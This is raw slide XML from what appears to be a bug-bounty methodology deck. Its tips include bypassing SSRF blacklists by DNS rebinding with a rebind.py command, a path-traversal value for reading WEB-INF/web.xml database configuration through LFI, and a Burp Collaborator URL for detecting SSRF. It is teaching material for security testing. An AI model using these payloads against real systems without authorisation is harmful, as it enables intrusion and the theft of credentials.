                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="953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" name="Google Shape;954;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS Rebinding Technique</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using Tools e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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Singularity</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> rebind.py </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass The Blacklist</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="955" name="Google Shape;955;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to produce :-</a:t>
            </a:r>
            <a:endParaRPr b="1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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Your Terminal</a:t>
            </a:r>
            <a:endParaRPr b="1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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write This Command</a:t>
            </a:r>
            <a:endParaRPr b="1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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>./rebind.py --ip1=Blacklist --ip2=Allowed --scheme=PORT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF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0FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="Google Shape;956;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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957" name="Google Shape;957;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;958;p97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="959" name="Google Shape;959;p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4538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="960" name="Google Shape;960;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="961" name="Google Shape;961;p9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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962" name="Google Shape;962;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="963" name="Google Shape;963;p9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2925" y="3082775"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964" name="Google Shape;964;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="965" name="Google Shape;965;p9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2925" y="3502300"/>
            <a:ext cx="503200" cy="36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6" name="Google Shape;966;p9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64025" y="3939925"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="967" name="Google Shape;967;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="97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" name="Google Shape;972;p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3" cy="4711826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-365850" y="4677225"/>
            <a:ext cx="9705900" cy="4974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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mark Valenzia</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>                                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Google Shape;974;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4711813"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="975" name="Google Shape;975;p9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30925" y="4760737"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsp/etc/../../WEB-INF/web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DB Configuration Files</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If There Is LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsp/etc/../../WEB-INF/web.xml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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68" name="Google Shape;268;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="272" name="Google Shape;272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8350" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="979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0" name="Google Shape;980;p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15650" y="-107600"/>
            <a:ext cx="961204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81" name="Google Shape;981;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-365850" y="4677225"/>
            <a:ext cx="9705900" cy="4974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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            Hack3rScr0lls</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>                                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="982" name="Google Shape;982;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4711813"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983" name="Google Shape;983;p9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30925" y="4760737"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="987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p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="2064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9" name="Google Shape;989;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639550" y="339175"/>
            <a:ext cx="441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675">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="127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600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9600">
              <a:solidFill>
                <a:srgbClr val="0B5394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990" name="Google Shape;990;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324350" y="2864775"/>
            <a:ext cx="5030100" cy="146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br>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t> Awali</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en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1" lang="en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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="0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991" name="Google Shape;991;p1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7450" y="4049201"/>
            <a:ext cx="727375" cy="564475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="992" name="Google Shape;992;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6032650" y="0"/>
            <a:ext cx="798300" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B5394"/>
          </a:solidFill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3" name="Google Shape;993;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189175" y="0"/>
            <a:ext cx="798300" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B5394"/>
          </a:solidFill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4" name="Google Shape;994;p100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8345700" y="0"/>
            <a:ext cx="798300" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B5394"/>
          </a:solidFill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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://id.burpcollaborator.net</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Full Request If There Is SSRF </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
